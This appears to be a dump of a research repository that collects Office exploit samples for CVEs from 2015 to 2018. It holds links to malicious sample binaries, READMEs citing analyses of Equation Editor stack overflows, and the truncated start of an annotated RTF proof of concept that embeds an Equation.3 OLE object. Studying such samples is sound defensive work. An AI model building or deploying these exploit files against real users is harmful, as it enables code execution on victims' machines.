\lsdlocked0 Light Shading Accent 3;\lsdsemihidden0 \lsdunhideused0 \lsdpriority61 \lsdlocked0 Light List Accent 3; 207 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority62 \lsdlocked0 Light Grid Accent 3;\lsdsemihidden0 \lsdunhideused0 \lsdpriority63 \lsdlocked0 Medium Shading 1 Accent 3;\lsdsemihidden0 \lsdunhideused0 \lsdpriority64 \lsdlocked0 Medium Shading 2 Accent 3; 208 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority65 \lsdlocked0 Medium List 1 Accent 3;\lsdsemihidden0 \lsdunhideused0 \lsdpriority66 \lsdlocked0 Medium List 2 Accent 3;\lsdsemihidden0 \lsdunhideused0 \lsdpriority67 \lsdlocked0 Medium Grid 1 Accent 3; 209 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority68 \lsdlocked0 Medium Grid 2 Accent 3;\lsdsemihidden0 \lsdunhideused0 \lsdpriority69 \lsdlocked0 Medium Grid 3 Accent 3;\lsdsemihidden0 \lsdunhideused0 \lsdpriority70 \lsdlocked0 Dark List Accent 3; 210 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority71 \lsdlocked0 Colorful Shading Accent 3;\lsdsemihidden0 \lsdunhideused0 \lsdpriority72 \lsdlocked0 Colorful List Accent 3;\lsdsemihidden0 \lsdunhideused0 \lsdpriority73 \lsdlocked0 Colorful Grid Accent 3; 211 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority60 \lsdlocked0 Light Shading Accent 4;\lsdsemihidden0 \lsdunhideused0 \lsdpriority61 \lsdlocked0 Light List Accent 4;\lsdsemihidden0 \lsdunhideused0 \lsdpriority62 \lsdlocked0 Light Grid Accent 4; 212 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority63 \lsdlocked0 Medium Shading 1 Accent 4;\lsdsemihidden0 \lsdunhideused0 \lsdpriority64 \lsdlocked0 Medium Shading 2 Accent 4;\lsdsemihidden0 \lsdunhideused0 \lsdpriority65 \lsdlocked0 Medium List 1 Accent 4; 213 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority66 \lsdlocked0 Medium List 2 Accent 4;\lsdsemihidden0 \lsdunhideused0 \lsdpriority67 \lsdlocked0 Medium Grid 1 Accent 4;\lsdsemihidden0 \lsdunhideused0 \lsdpriority68 \lsdlocked0 Medium Grid 2 Accent 4; 214 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority69 \lsdlocked0 Medium Grid 3 Accent 4;\lsdsemihidden0 \lsdunhideused0 \lsdpriority70 \lsdlocked0 Dark List Accent 4;\lsdsemihidden0 \lsdunhideused0 \lsdpriority71 \lsdlocked0 Colorful Shading Accent 4; 215 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority72 \lsdlocked0 Colorful List Accent 4;\lsdsemihidden0 \lsdunhideused0 \lsdpriority73 \lsdlocked0 Colorful Grid Accent 4;\lsdsemihidden0 \lsdunhideused0 \lsdpriority60 \lsdlocked0 Light Shading Accent 5; 216 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority61 \lsdlocked0 Light List Accent 5;\lsdsemihidden0 \lsdunhideused0 \lsdpriority62 \lsdlocked0 Light Grid Accent 5;\lsdsemihidden0 \lsdunhideused0 \lsdpriority63 \lsdlocked0 Medium Shading 1 Accent 5; 217 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority64 \lsdlocked0 Medium Shading 2 Accent 5;\lsdsemihidden0 \lsdunhideused0 \lsdpriority65 \lsdlocked0 Medium List 1 Accent 5;\lsdsemihidden0 \lsdunhideused0 \lsdpriority66 \lsdlocked0 Medium List 2 Accent 5; 218 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority67 \lsdlocked0 Medium Grid 1 Accent 5;\lsdsemihidden0 \lsdunhideused0 \lsdpriority68 \lsdlocked0 Medium Grid 2 Accent 5;\lsdsemihidden0 \lsdunhideused0 \lsdpriority69 \lsdlocked0 Medium Grid 3 Accent 5; 219 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority70 \lsdlocked0 Dark List Accent 5;\lsdsemihidden0 \lsdunhideused0 \lsdpriority71 \lsdlocked0 Colorful Shading Accent 5;\lsdsemihidden0 \lsdunhideused0 \lsdpriority72 \lsdlocked0 Colorful List Accent 5; 220 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority73 \lsdlocked0 Colorful Grid Accent 5;\lsdsemihidden0 \lsdunhideused0 \lsdpriority60 \lsdlocked0 Light Shading Accent 6;\lsdsemihidden0 \lsdunhideused0 \lsdpriority61 \lsdlocked0 Light List Accent 6; 221 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority62 \lsdlocked0 Light Grid Accent 6;\lsdsemihidden0 \lsdunhideused0 \lsdpriority63 \lsdlocked0 Medium Shading 1 Accent 6;\lsdsemihidden0 \lsdunhideused0 \lsdpriority64 \lsdlocked0 Medium Shading 2 Accent 6; 222 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority65 \lsdlocked0 Medium List 1 Accent 6;\lsdsemihidden0 \lsdunhideused0 \lsdpriority66 \lsdlocked0 Medium List 2 Accent 6;\lsdsemihidden0 \lsdunhideused0 \lsdpriority67 \lsdlocked0 Medium Grid 1 Accent 6; 223 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority68 \lsdlocked0 Medium Grid 2 Accent 6;\lsdsemihidden0 \lsdunhideused0 \lsdpriority69 \lsdlocked0 Medium Grid 3 Accent 6;\lsdsemihidden0 \lsdunhideused0 \lsdpriority70 \lsdlocked0 Dark List Accent 6; 224 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority71 \lsdlocked0 Colorful Shading Accent 6;\lsdsemihidden0 \lsdunhideused0 \lsdpriority72 \lsdlocked0 Colorful List Accent 6;\lsdsemihidden0 \lsdunhideused0 \lsdpriority73 \lsdlocked0 Colorful Grid Accent 6; 225 | \lsdsemihidden0 \lsdunhideused0 \lsdqformat1 \lsdpriority19 \lsdlocked0 Subtle Emphasis;\lsdsemihidden0 \lsdunhideused0 \lsdqformat1 \lsdpriority21 \lsdlocked0 Intense Emphasis; 226 | \lsdsemihidden0 \lsdunhideused0 \lsdqformat1 \lsdpriority31 \lsdlocked0 Subtle Reference;\lsdsemihidden0 \lsdunhideused0 \lsdqformat1 \lsdpriority32 \lsdlocked0 Intense Reference; 227 | \lsdsemihidden0 \lsdunhideused0 \lsdqformat1 \lsdpriority33 \lsdlocked0 Book Title;\lsdpriority37 \lsdlocked0 Bibliography;\lsdqformat1 \lsdpriority39 \lsdlocked0 TOC Heading;}}{\*\datastore 010500000200000018000000 228 | 4d73786d6c322e534158584d4c5265616465722e352e30000000000000000000000e0000 229 | d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 230 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 231 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 232 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 233 | fffffffffffffffffdffffff04000000feffffff05000000fefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 234 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 235 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 236 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 237 | ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff01000000ec69d9888b8b3d4c859eaf6cd158be0f00000000000000000000000030ef 238 | bdbd73bfd0010300000080020000000000004d0073006f004400610074006100530074006f0072006500000000000000000000000000000000000000000000000000000000000000000000000000000000001a000101ffffffffffffffff02000000000000000000000000000000000000000000000030efbdbd73bfd001 239 | 30efbdbd73bfd00100000000000000000000000048004f003300d500d400d6004c004f00c100d40043005100cf00dc00d1003400d700cb00c40055004b00c0003d003d000000000000000000000000000000000032000101ffffffffffffffff03000000000000000000000000000000000000000000000030efbdbd73bf 240 | d00130efbdbd73bfd0010000000000000000000000004900740065006d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000201ffffffff04000000ffffffff000000000000000000000000000000000000000000000000 241 | 00000000000000000000000000000000e800000000000000010000000200000003000000feffffff0500000006000000070000000800000009000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 242 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 243 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 244 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 245 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff3c623a536f75726365732053656c65637465645374796c653d225c4150412e58534c22205374796c654e616d653d224150412046696674682045646974696f6e2220786d6c6e733a623d22687474703a2f2f736368656d61732e6f70656e 246 | 786d6c666f726d6174732e6f72672f6f6666696365446f63756d656e742f323030362f6269626c696f6772617068792220786d6c6e733d22687474703a2f2f736368656d61732e6f70656e786d6c666f726d6174732e6f72672f6f6666696365446f63756d656e742f323030362f6269626c696f677261706879223e3c2f 247 | 623a536f75726365733e0d0a0000000000000000000000000000000000000000000000003c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d3822207374616e64616c6f6e653d226e6f223f3e0d0a3c64733a6461746173746f72654974656d2064733a6974656d49443d227b44333735 248 | 453731432d434536322d343038372d393042462d4343354544454239313432417d2220786d6c6e733a64733d22687474703a2f2f736368656d61732e6f70656e786d6c666f726d6174732e6f72672f6f6666696365446f63756d656e742f323030362f637573746f6d586d6c223e3c64733a736368656d61526566733e3c 249 | 64733a736368656d615265662064733a7572693d22687474703a2f2f736368656d61732e6f70656e500072006f007000650072007400690065007300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000200ffffffffffffffffffffffff000000000000 250 | 0000000000000000000000000000000000000000000000000000000000000400000055010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff00000000 251 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff0000 252 | 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff 253 | 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000786d6c666f726d6174732e6f72672f6f6666696365446f63756d656e742f323030362f6269626c696f677261706879222f3e3c2f64733a736368656d61526566733e3c2f64733a6461746173746f 254 | 72654974656d3e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 255 | 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 256 | 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 257 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000}} -------------------------------------------------------------------------------- /CVE-2015-0097/poc.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2015-0097/poc.bin -------------------------------------------------------------------------------- /CVE-2015-1641/8bb066160763ba4a0b65ae86d3cfedff8102e2eacbf4e83812ea76ea5ab61a31.bin.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2015-1641/8bb066160763ba4a0b65ae86d3cfedff8102e2eacbf4e83812ea76ea5ab61a31.bin.gz -------------------------------------------------------------------------------- /CVE-2015-1641/README.md: -------------------------------------------------------------------------------- 1 | reference:[CVE-2015-1641 Word 利用样本分析](https://paper.seebug.org/351/) 2 | -------------------------------------------------------------------------------- /CVE-2015-2545/3a65d4b3bc18352675cd02154ffb388035463089d59aad36cadb1646f3a3b0fc.bin.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2015-2545/3a65d4b3bc18352675cd02154ffb388035463089d59aad36cadb1646f3a3b0fc.bin.gz -------------------------------------------------------------------------------- /CVE-2015-2545/README.md: -------------------------------------------------------------------------------- 1 | reference:[CVE-2015-2545 Word 利用样本分析](https://paper.seebug.org/368/) 2 | -------------------------------------------------------------------------------- /CVE-2016-7193/00bc76898f07f18122f386b890d79c9338d223a5b5c89213a4bbf1040bccfa28.bin.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2016-7193/00bc76898f07f18122f386b890d79c9338d223a5b5c89213a4bbf1040bccfa28.bin.gz -------------------------------------------------------------------------------- /CVE-2016-7193/README.md: -------------------------------------------------------------------------------- 1 | reference:[APT 攻击利器-Word 漏洞 CVE-2016-7193 原理揭秘](https://paper.seebug.org/288/) 2 | -------------------------------------------------------------------------------- /CVE-2017-0199&CVE-2017-8570/README.md: -------------------------------------------------------------------------------- 1 | Given the fact that CVE-2017-8570 is CVE-2017-0199's patch bypass,and they are confusing so I just put them together.For example,this article:http://www.freebuf.com/news/143206.html is totally wrong. 2 | 3 | reference: 4 | 5 | CVE-2017-0199 6 | 7 | [乌龙的CVE-2017-8570样本及背后的狗血](http://www.freebuf.com/news/143685.html) 8 | 9 | https://github.com/bhdresh/CVE-2017-0199 10 | 11 | [An Inside Look at CVE-2017-0199 – HTA and Scriptlet File Handler Vulnerability](https://www.fortinet.com/blog/threat-research/an-inside-look-at-cve-2017-0199-hta-and-scriptlet-file-handler-vulnerability) 12 | 13 | CVE-2017-8570 14 | 15 | https://github.com/rxwx/CVE-2017-8570 16 | 17 | [CVE-2017-8570首次公开的野外样本及漏洞分析](https://www.anquanke.com/post/id/96607) 18 | 19 | ["Bypassing" Microsoft's Patch for CVE-2017-0199](http://justhaifei1.blogspot.ca/2017/07/bypassing-microsofts-cve-2017-0199-patch.html) 20 | -------------------------------------------------------------------------------- /CVE-2017-0261&CVE-2017-0262/6785e29698444243677300db6a0c519909ae9e620d575e76d9be4862b33ed490.bin.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2017-0261&CVE-2017-0262/6785e29698444243677300db6a0c519909ae9e620d575e76d9be4862b33ed490.bin.gz -------------------------------------------------------------------------------- /CVE-2017-0261&CVE-2017-0262/91acb0d56771af0196e34ac95194b3d0bf3200bc5f6208caf3a91286958876f9.bin.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2017-0261&CVE-2017-0262/91acb0d56771af0196e34ac95194b3d0bf3200bc5f6208caf3a91286958876f9.bin.gz -------------------------------------------------------------------------------- /CVE-2017-0261&CVE-2017-0262/README.md: -------------------------------------------------------------------------------- 1 | reference: 2 | 3 | [EPS Processing Zero-Days Exploited by Multiple Threat Actors](https://www.mandiant.com/resources/blog/eps-processing-zero-days) 4 | 5 | [Sednit adds two zero-day exploits using ‘Trump’s attack on Syria’ as a decoy](https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/) 6 | -------------------------------------------------------------------------------- /CVE-2017-0261&CVE-2017-0262/ef783cc3c4e1e0649b4629f3396cff4c0e0e0e67c07cacb8a9ae7c0cfa16bf0c.bin.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2017-0261&CVE-2017-0262/ef783cc3c4e1e0649b4629f3396cff4c0e0e0e67c07cacb8a9ae7c0cfa16bf0c.bin.gz -------------------------------------------------------------------------------- /CVE-2017-11826/README.md: -------------------------------------------------------------------------------- 1 | reference: 2 | 3 | [CVE-2017-11826漏洞分析、利用及动态检测](https://www.anquanke.com/post/id/87122) 4 | 5 | [CVE-2017-11826 Exploited in the Wild with Politically Themed RTF Document](https://www.fortinet.com/blog/threat-research/cve-2017-11826-exploited-in-the-wild-with-politically-themed-rtf-document) 6 | -------------------------------------------------------------------------------- /CVE-2017-11826/aed93c002574f25dabd1859f080203a2c8f332e92c80db9aa983316695d938d3.bin.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2017-11826/aed93c002574f25dabd1859f080203a2c8f332e92c80db9aa983316695d938d3.bin.gz -------------------------------------------------------------------------------- /CVE-2017-11882&CVE-2018-0802&CVE-2018-0798/25a473ec43acfe80182d3fd6cd9cf87ac362a18b78a554bf1dda8d9dc05bee08.bin.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2017-11882&CVE-2018-0802&CVE-2018-0798/25a473ec43acfe80182d3fd6cd9cf87ac362a18b78a554bf1dda8d9dc05bee08.bin.gz -------------------------------------------------------------------------------- /CVE-2017-11882&CVE-2018-0802&CVE-2018-0798/README.md: -------------------------------------------------------------------------------- 1 | Given the fact that CVE-2017-11882/CVE-2018-0802/CVE-2018-0798 are stackoverflow in EQNEDT32.EXE so I just put them together. 2 | 3 | CVE-2017-11882:stackoverflow during font name parse 4 | 5 | CVE-2018-0802:stackoverflow during font name parse 6 | 7 | CVE-2018-0798:stackoverflow during matrix record parse 8 | 9 | 25a473ec43acfe80182d3fd6cd9cf87ac362a18b78a554bf1dda8d9dc05bee08[4] exploit both CVE-2017-11882 and CVE-2018-0802; 10 | 11 | **cve-2018-0802 poc with aslr-bypass.rtf and cve-2018-0802 poc with comments.rtf exploit CVE-2018-0798.The so-called CVE-2018-0802 in the checkpoint article is actually CVE-2018-0798.Due to Microsoft's mistake,CVE-2018-0798 submitted by checkpoint[6] was classified into CVE-2018-0802,which caused extensive discussions among analysts at home and abroad.** 12 | 13 | Microsoft add ASLR and fix serveral strcpy in 2017.11's patch but clearly not enough.So they remove this component in 2018.1's patch. 14 | 15 | reference: 16 | 17 | CVE-2017-11882 18 | 19 | 1.[CVE-2017-11882漏洞分析、利用及动态检测](https://www.anquanke.com/post/id/87311) 20 | 21 | 2.[Proof-of-Concept exploits for CVE-2017-11882](https://github.com/embedi/CVE-2017-11882) 22 | 23 | 3.[Did Microsoft Just Manually Patch Their Equation Editor Executable? Why Yes, Yes They Did.(CVE-2017-11882)](https://blog.0patch.com/2017/11/did-microsoft-just-manually-patch-their.html) 24 | 25 | CVE-2018-0802 26 | 27 | 4.["黑凤梨"(BlackTech)最新APT攻击活动分析](http://www.freebuf.com/column/159865.html) 28 | 29 | CVE-2018-0798 30 | 31 | 5.[手把手教你复现office公式编辑器内的第三个漏洞](https://www.anquanke.com/post/id/94841) 32 | 33 | 6.[Many Formulas,One Calc–Exploiting a New Office Equation Vulnerability](https://research.checkpoint.com/2018/another-office-equation-rce-vulnerability/) 34 | -------------------------------------------------------------------------------- /CVE-2017-11882&CVE-2018-0802&CVE-2018-0798/cve-2018-0802 poc with comments.rtf: -------------------------------------------------------------------------------- 1 | {\rtf1 2 | { Hello, calculator! } 3 | {\object \objemb \objupdate \objw1 \objh1 4 | {\*\objclass Equation.3} 5 | {\*\objdata 6 | 01050000 {\*\comment OLE Version } 7 | 02000000 {\*\comment Format ID -> 0x02 = Embedded Object } 8 | 0b000000 {\*\comment ClassName.Length -> 0x0B = 11 } 9 | 4571756174696f6e2e3300 {\*\comment ClassName.String -> "Equation.3\x00" } 10 | 00000000 {\*\comment TopicName.Length -> 0x00 } 11 | 00000000 {\*\comment Item.Length -> 0x00 } 12 | 00140000 {\*\comment NativeData.Size -> 0x1400 = 5120 } 13 | 14 | D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF0900060000000000000000000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFF04000000FEFFFFFF05000000FEFFFFFF060000000700000008000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500FFFFFFFFFFFFFFFF0200000002CE020000000000C000000000000046000000000000000000000000304E4E74DF0AD30103000000C00900000000000001004F006C00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A000201FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006F006D0070004F0062006A00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000004000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004F0062006A0049006E0066006F0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000FEFFFFFF02000000FEFFFFFFFEFFFFFF05000000060000000700000008000000090000000A0000000B0000000C0000000D0000000E0000000F0000001000000011000000120000001300000014000000FEFFFFFF160000001700000018000000190000001A0000001B0000001C0000001D0000001E0000001F00000020000000210000002200000023000000240000002500000026000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100FEFF030A0000FFFFFFFF02CE020000000000C000000000000046170000004D6963726F736F6674204571756174696F6E20332E30000C0000004453204571756174696F6E000B0000004571756174696F6E2E3300F439B271000000000000000000000000000000000000000000000000000000000000000000000000000000000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF030000000400000001000000FFFFFFFF00000000000000007349000034060000040400000100090000030202000004001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A005A0421200000026060F001A00FFFFFFFF000010000000C0FFFFFFC0FFFFFF60420000600500000B00000026060F000C004D617468547970650000C00008000000FA0200000800000000000000040000002D010000050000001402F8016000050000001302F801404208000000FA0200001000000000000000040000002D010100050000001402C0034000050002004F006C0065005000720065007300300030003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000180002010300000005000000FFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000040000002C040000000000004500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000